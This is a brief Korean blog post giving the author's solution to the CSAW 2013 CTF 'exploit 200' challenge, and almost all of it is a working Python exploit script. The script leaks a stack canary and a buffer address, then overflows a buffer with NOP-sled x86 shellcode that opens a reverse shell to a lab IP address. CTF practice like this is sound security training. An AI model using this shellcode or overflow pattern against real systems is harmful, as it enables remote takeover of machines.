CSAW2013 exploit 200

ctf 드디어 입문했다.. 풀었을때 쾌감이 워게임에 비해 굉장히 큰거같다 

exploit2

따로 설명할건 없을거같고 .. 같이 공부하고있는애가 잘 이해를 못해서 그림을 그렷엇는데 그걸 첨부하겟다

[exploit]

from socket import *
from struct import pack,unpack
import time

p=lambda x: pack("<l",x)
up=lambda x: unpack("<l",x)[0]

buffer=0x00000000

shell =  ""
shell += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
shell += "\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
shell += "\x0b\xcd\x80"

HOST="192.168.72.148"
PORT=31338

s=socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
buffer=s.recv(4)
print"[*]Buffer:" +hex(up(buffer))
canary=s.recv(4)
print"[*]Canary:" +hex(up(canary))
s.recv(7777)

Payload =""
Payload += "\x90"*30
Payload += shell
Payload += "\x90"*(0x800-len(Payload))
Payload += canary
Payload += "\x90"*(0x80c-len(Payload))
Payload += "GOOD"
Payload += buffer
print "[*]I need Your Password! By Symnoisy"
s.send(Payload)

raw_input("\n Give me !!!!>")